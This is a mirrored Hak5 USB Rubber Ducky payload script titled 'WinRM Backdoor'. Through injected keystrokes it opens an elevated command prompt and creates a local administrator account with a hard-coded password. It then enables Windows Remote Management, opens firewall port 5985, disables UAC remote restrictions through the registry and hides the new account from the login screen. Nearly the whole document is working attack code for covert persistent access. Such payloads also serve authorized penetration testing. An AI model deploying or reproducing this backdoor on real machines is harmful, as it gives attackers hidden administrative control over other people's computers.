Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/remote_access/win_winrm-backdoor/payload.txt
3018 views
1
REM #
2
REM # Title: "Microsoft Windows" WinRM Backdoor
3
REM #
4
REM # Description:
5
REM # 1) Adds a user account (RD_User:RD_P@ssW0rD).
6
REM # 2) Adds this local user to local administrator group.
7
REM # 3) Enables "Windows Remote Management" with default settings.
8
REM # 4) Adds a rule to the firewall.
9
REM # 5) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
10
REM # 6) Hides this user account.
11
REM #
12
REM # Author: TW-D
13
REM # Version: 1.0
14
REM # Category: Remote Access
15
REM # Target: Microsoft Windows
16
REM #
17
REM # TESTED ON
18
REM # ===============
19
REM # Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
20
REM # Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
21
REM #
22
REM # REQUIREMENTS
23
REM # ===============
24
REM # The target user must belong to the 'Administrators' group.
25
REM #
26
27
REM ######## INITIALIZATION ########
28
29
DELAY 2000
30
31
REM ######## STAGE1 ########
32
33
GUI r
34
DELAY 3000
35
STRING cmd
36
DELAY 1000
37
CTRL-SHIFT ENTER
38
DELAY 3000
39
LEFTARROW
40
DELAY 5000
41
ENTER
42
DELAY 5000
43
44
REM ######## STAGE2 ########
45
46
STRING NET USER RD_User RD_P@ssW0rD /ADD
47
ENTER
48
DELAY 1500
49
50
STRING NET LOCALGROUP Administrators RD_User /ADD
51
ENTER
52
DELAY 1500
53
54
REM ######## STAGE3 ########
55
56
STRING WINRM QUICKCONFIG
57
ENTER
58
DELAY 4000
59
60
STRING y
61
ENTER
62
DELAY 1500
63
64
STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Windows Remote Management for RD" PROTOCOL=TCP LOCALPORT=5985 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN
65
ENTER
66
DELAY 1500
67
68
REM ######## STAGE4 ########
69
70
STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
71
ENTER
72
DELAY 1500
73
74
STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v RD_User /t REG_DWORD /d 0
75
ENTER
76
DELAY 1500
77
78
REM ######## FINISH ########
79
80
STRING EXIT
81
ENTER
82
83